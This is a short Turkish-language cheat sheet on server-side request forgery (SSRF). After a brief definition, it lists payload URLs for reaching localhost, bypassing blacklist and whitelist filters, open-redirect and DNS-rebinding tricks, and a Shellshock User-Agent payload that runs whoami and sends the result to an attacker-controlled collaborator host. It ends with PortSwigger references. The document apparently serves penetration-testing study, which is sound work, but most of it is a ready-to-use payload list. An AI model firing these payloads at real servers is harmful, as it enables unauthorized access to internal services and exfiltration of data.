SSRF

SSRF Nedir?

• Server Side Request Forgery, bir saldırganın sunucu tarafı uygulamasının istenmeyen bir konuma istekte bulunmasına olan bir web güvenlik açığıdır.

• Bir SSRF saldırısında, saldırgan sunucunun kuruluşun altyapısındaki yalnızca dahili hizmetlere bağlantı kurmasına neden olabilir. Diğer durumlarda, sunucuyu rastgele harici sistemlere bağlanmaya zorlayabilirler. Bu, yetkilendirme kimlik bilgileri gibi hassas verilerin sızmasına neden olabilir.

Yöntemler

Basit SSRF

http://localhost:80
http://127.0.0.1:80
http://0.0.0.0:80

Blacklist Bypass

http://0/
http://127.1
http://127.0.1
http://2130706433/

Whitelist Bypass

http://127.0.0.1#@example.com
http://127.0.0.1%2523@example.com

Out of Band SSRF

http://COLLABORATOR

Open Redirect SSRF

http://example.com?redirect=127.0.0.1

DNS Rebinding SSRF

Rebinder: https://lock.cmpxchg8b.com/rebinder.html

Nip: https://nip.io/

http://7f000001.7f000001.rbndr.us

Shellshock

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).COLLABORATOR

Kaynaklar

• Portswigger Academy: https://portswigger.net/web-security/ssrf
• Bypass Metodları: https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet